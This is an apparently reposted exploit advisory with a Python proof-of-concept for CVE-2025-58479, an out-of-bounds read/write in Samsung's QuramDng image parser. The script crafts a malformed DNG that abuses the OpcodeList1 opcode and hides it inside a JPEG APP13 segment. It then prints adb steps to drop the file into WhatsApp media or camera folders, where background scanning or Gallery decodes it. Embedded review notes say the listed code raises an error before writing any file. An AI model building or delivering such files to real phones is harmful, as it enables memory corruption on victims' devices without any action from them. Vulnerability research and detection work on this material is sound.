Samsung QuramDng Embedded DNG Out-Of-Bounds Read / Write

=============================================================================================================================================
| # Title Samsung QuramDng Embedded DNG Out-Of-Bounds Read / Write

=============================================================================================================================================
| # Title : Samsung QuramDng via Malicious DNG Embedded in JPEG Out-of-Bounds Read/Write |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.samsung.com/us/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/213367/ & CVE-2025-58479

[+] Summary : This proof-of-concept demonstrates an out-of-bounds read/write vulnerability in Samsung's QuramDng image parser, affecting Galaxy S22-S25 devices running One UI 6+.
By crafting a malformed DNG that abuses the OpcodeList1 (specifically the FixBadPixelsList opcode) and embedding it inside a JPEG container, the parser processes invalid pixel coordinates without proper bounds checking.
When handled by system components such as com.samsung.ipservice, Media Scanner, or Samsung Gallery, the malformed metadata can trigger memory corruption and result in a crash (SIGSEGV) within libimagecodec.quram.so.

[+] POC :

#!/usr/bin/env python3

import struct
import sys
import os

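def create_malicious_dng():
    """Return the author's little-endian TIFF/DNG test blob as ``bytes``.

    The listing on the page lost its indentation and does not parse as
    Python; this version restores the structure, drops two locals that were
    assigned but never read, and pads the opcode buffer in one call instead
    of a byte-at-a-time loop. The returned bytes are identical to what the
    original statements build.

    Layout written, in order:
      * 8-byte TIFF header: ``II``, magic 42, first-IFD offset 8.
      * An entry count of 5, followed by four LONG (type 4) entries for
        tags 256/257 (ImageWidth/ImageLength) and 322/323
        (TileWidth/TileLength).
      * Tag 51008 (OpcodeList1, the tag the page's summary refers to) with
        type 1 and count 100, followed by three 32-bit words.
      * A 36-byte opcode buffer, then 65536 zero bytes of image data.

    NOTE(review): the meaning of the individual opcode fields is not stated
    on the page; the values are reproduced as the author wrote them and have
    not been checked against the DNG specification.
    """
    blob = bytearray(b'II\x2A\x00')
    blob += struct.pack('<I', 8)

    # IFD entry count, then tag / type / count / value for each dimension tag.
    blob += struct.pack('<H', 5)
    for tag, value in ((256, 1024), (257, 32), (322, 1024), (323, 32)):
        blob += struct.pack('<HHII', tag, 4, 1, value)

    # OpcodeList1 tag with the author's type and count fields.
    blob += struct.pack('<HHI', 51008, 1, 100)

    # The offset is taken before the next three words are appended, so it is
    # the position four bytes past the current end of the buffer.
    opcode_offset = len(blob) + 4
    blob += struct.pack('<III', opcode_offset, 0, opcode_offset)

    # Opcode buffer: 29 bytes of packed fields (0x41414141 is a filler
    # pattern), zero-padded to the 36 bytes the original loop produced.
    opcode_data = struct.pack(
        '<HHIIB8H',
        1, 36, 0x00030001, 0x41414141, 0,
        1, 1, 32, 0, 0, 0, 1, 1,
    )
    blob += opcode_data.ljust(36, b'\x00')

    blob += b'\x00' * 1024 * 32 * 2  # Minimal raw image data

    return bytes(blob)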

def create_poc_jpeg_wrapper():
    """Assemble the JPEG-style container around the embedded DNG blob.

    Segments are concatenated in the author's order: SOI + APP0 (JFIF),
    a COM segment naming the CVE, an APP13 (0xFFED) segment carrying the
    output of create_malicious_dng(), then DQT, SOF0 and DHT markers with
    fixed bodies, further raw bytes, and EOI.

    For detection work, the distinguishing trait of the intended file is an
    APP13 segment whose payload begins with a little-endian TIFF header
    (``II*\\0``) rather than the usual contents of that segment.

    Raises:
        struct.error: NOTE(review) - as listed, create_malicious_dng()
            returns 65650 bytes, so ``len(...) + 2`` does not fit the
            unsigned 16-bit ``'>H'`` length field and the pack call below
            raises. The script therefore stops here and writes no file.
    """
    embedded = create_malicious_dng()
    note = b"Malicious DNG for CVE-2025-58479"

    segments = [
        # SOI followed by the APP0/JFIF header.
        b'\xFF\xD8\xFF\xE0',
        b'\x00\x10',
        b'JFIF\x00\x01\x02\x00\x00\x64\x00\x64\x00\x00',
        # COM segment; the length field counts its own two bytes.
        b'\xFF\xFE',
        struct.pack('>H', len(note) + 2),
        note,
        # APP13 segment holding the embedded blob.
        b'\xFF\xED',
        struct.pack('>H', len(embedded) + 2),
        embedded,
        # DQT marker and fixed table body.
        b'\xFF\xDB',
        b'\x00\x43\x00\x03\x02\x02\x02\x02\x02\x03\x02\x02\x02\x03\x03\x03\x03\x04\x06\x04\x04\x04\x04\x04\x08\x06\x06\x05\x06\x09\x08\x0A\x0A\x09\x08\x09\x09\x0A\x0C\x0F\x0C\x0A\x0B\x0E\x0B\x09\x09\x0D\x11\x0D\x0E\x0F\x10\x10\x11\x10\x0A\x0C\x12\x13\x12\x10\x13\x0F\x10\x10\x10\x01',
        # SOF0 marker and frame header bytes.
        b'\xFF\xC0',
        b'\x00\x0B\x08\x00\x01\x00\x01\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01',
        # DHT marker and table bytes, then the author's trailing raw bytes.
        b'\xFF\xC4',
        b'\x00\x1F\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B',
        b'\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00',
        b'\x00',
        # EOI.
        b'\xFF\xD9',
    ]

    return b"".join(segments)

def main():
    """Build the container, write it to the working directory, print the author's test notes.

    The output file is ``poc_cve_2025_58479.jpeg``. The printed steps name
    the two handling paths the page describes: a media-scanner broadcast for
    a file under the WhatsApp media directory (processed by
    com.samsung.ipservice) and a file under DCIM/Camera opened in Samsung
    Gallery.

    NOTE(review): with the listing as published, create_poc_jpeg_wrapper()
    raises struct.error before the file is opened, so nothing after the
    first two banner lines runs.
    """
    print("[*] Creating PoC for CVE-2025-58479 - Samsung QuramDng OOB Vulnerability")
    print("[*] Affected: Samsung Galaxy S22-S25 with One UI 6+")

    payload = create_poc_jpeg_wrapper()

    filename = "poc_cve_2025_58479.jpeg"
    with open(filename, "wb") as out_file:
        out_file.write(payload)

    report = (
        f"[+] Created malicious file: {filename}",
        f"[+] File size: {len(payload)} bytes",
        "\n[*] To test on device:",
        f" adb push {filename} /storage/emulated/0/Android/media/com.whatsapp/WhatsApp/Media/WhatsApp\\ Images/",
        f" adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:///storage/emulated/0/Android/media/com.whatsapp/WhatsApp/Media/WhatsApp%20Images/{filename}",
        "\n[*] Wait ~5 minutes for com.samsung.ipservice to process the file",
        "[*] Expected: Crash in libimagecodec.quram.so with SIGSEGV",
        "\n[*] Alternative test with Gallery:",
        f" adb push {filename} /storage/emulated/0/DCIM/Camera/",
        f" adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:///storage/emulated/0/DCIM/Camera/{filename}",
        "\n[*] Open Samsung Gallery to trigger decode",
    )
    # One print call per entry keeps stdout identical to the original sequence.
    for line in report:
        print(line)

# Run the generator only when the file is executed as a script, not on import.
if __name__ == "__main__":
    main()

Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================